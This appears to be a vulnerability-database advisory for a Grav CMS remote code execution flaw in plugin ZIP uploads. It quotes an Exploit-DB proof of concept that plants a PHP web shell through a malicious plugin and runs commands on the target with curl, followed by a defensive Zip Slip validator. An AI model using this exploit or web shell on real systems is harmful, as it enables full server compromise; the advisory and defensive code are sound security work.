CVE-2026-42607

Severity: critical
Published 2026-05-05 · Modified 2026-05-13
CVSS v3: 9.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
CVSS v4: not yet in upstream
VIR risk: 10.0

Description

Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature

Predictions

Exploit likelihood: 100%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52578 webapps php text · 2 KB
Mustafa Murat Akgül · 2026-05-26

Grav CMS 2.0.0-beta.2 - Remote Code Execution

Source: Exploit-DB
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE) 
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)

Technical Details:
The Grav CMS "Direct Install" feature in the Admin plugin allows administrators 
to upload plugins as ZIP files. The system failed to adequately validate the 
contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction. 
By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized), 
an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory.

Proof of Concept (PoC):

1. Create a malicious plugin structure:
   - shellplugin/blueprints.yaml
   - shellplugin/shellplugin.yaml
   - shellplugin/shellplugin.php (Payload below)

--- shellplugin.php ---
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;

class ShellpluginPlugin extends Plugin {
    public static function getSubscribedEvents(): array {
        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
    }
    public function onPluginsInitialized(): void {
        $shell_path = GRAV_ROOT . '/shell.php';
        if (!file_exists($shell_path)) {
            file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
        }
    }
}
----------------------

2. Compress the directory:
   $ zip -r shellplugin.zip shellplugin/

3. Log in to the Grav Admin panel and navigate to:
   /admin/tools/direct-install

4. Upload the 'shellplugin.zip' file.

5. Once installed, the plugin triggers on the next request to the site, 
   dropping a shell at the root.

6. Access your shell:
   curl "http://<target>/shell.php?cmd=id"

Exploit Script (Python):
[You can add the Python script you shared above here]

Impact:
Full system-level access under the context of the web server user. An attacker 
with administrative privileges (or via CSRF) can compromise the entire server.
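As an added example (not Grav's own code and not part of the Exploit-DB entry), a defender-side check for the Zip Slip condition described in the Technical Details: before extraction, every entry of an uploaded plugin archive must resolve under one top-level directory named for the plugin, and archives containing traversal components, absolute or non-portable paths, or symlinks are rejected outright. The expected layout (`plugin_name/blueprints.yaml` and friends) is assumed from the PoC's plugin structure; both sample archives are constructed in memory.

```python
import io
import stat
import zipfile
from typing import Optional

def check_entry(info: zipfile.ZipInfo, top: str) -> Optional[str]:
    """Return why one archive entry must be rejected, or None if it is acceptable."""
    name = info.filename
    # ZIP names are '/'-separated; backslashes, drive letters and a leading '/' are hostile.
    if "\\" in name or ":" in name or name.startswith("/"):
        return f"absolute or non-portable path: {name!r}"
    parts = [p for p in name.split("/") if p]
    if any(p in ("..", ".") for p in parts):
        return f"path traversal component: {name!r}"
    if not parts or parts[0] != top:
        return f"entry outside plugin directory {top!r}: {name!r}"
    # On Unix-made archives the upper 16 bits of external_attr carry the file mode.
    if stat.S_ISLNK(info.external_attr >> 16):
        return f"symlink entry not allowed: {name!r}"
    return None

def validate_plugin_zip(data: bytes, plugin_name: str) -> list[str]:
    """Reasons to reject the upload; an empty list means every entry stays under plugin_name/."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    problems = [r for r in (check_entry(i, plugin_name) for i in infos) if r]
    # Assumed plugin layout (from the PoC): a blueprints.yaml must sit in the plugin directory.
    if f"{plugin_name}/blueprints.yaml" not in {i.filename for i in infos}:
        problems.append("missing blueprints.yaml")
    return problems

def build_zip(entries) -> bytes:
    """Constructed test input: in-memory ZIP from (name, data, is_symlink) tuples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, is_link in entries:
            info = zipfile.ZipInfo(name)
            if is_link:
                info.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(info, data)
    return buf.getvalue()

GOOD_ZIP = build_zip([("myplugin/blueprints.yaml", b"name: myplugin\n", False),
                      ("myplugin/myplugin.yaml", b"enabled: true\n", False),
                      ("myplugin/myplugin.php", b"<?php // plugin code\n", False)])
# Constructed hostile archive: one traversal entry and one symlink pointing out of the tree.
BAD_ZIP = build_zip([("myplugin/blueprints.yaml", b"name: myplugin\n", False),
                     ("../../outside.php", b"<?php // would land outside the plugin dir\n", False),
                     ("myplugin/link", b"/etc/passwd", True)])
```

This covers only the path-traversal half of the finding: an installed plugin's PHP still runs as the web server user by design, which is why the Direct Install endpoint itself depends on strict admin-only access and CSRF protection.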

Package impact

Ecosystem        Package        Vulnerable       Fixed
php Packagist    getgrav/grav   <2.0.0-beta.2    2.0.0-beta.2
php COMPOSER     getgrav/grav   < 2.0.0-beta.2   2.0.0-beta.2

References

CWEs

CWE-94
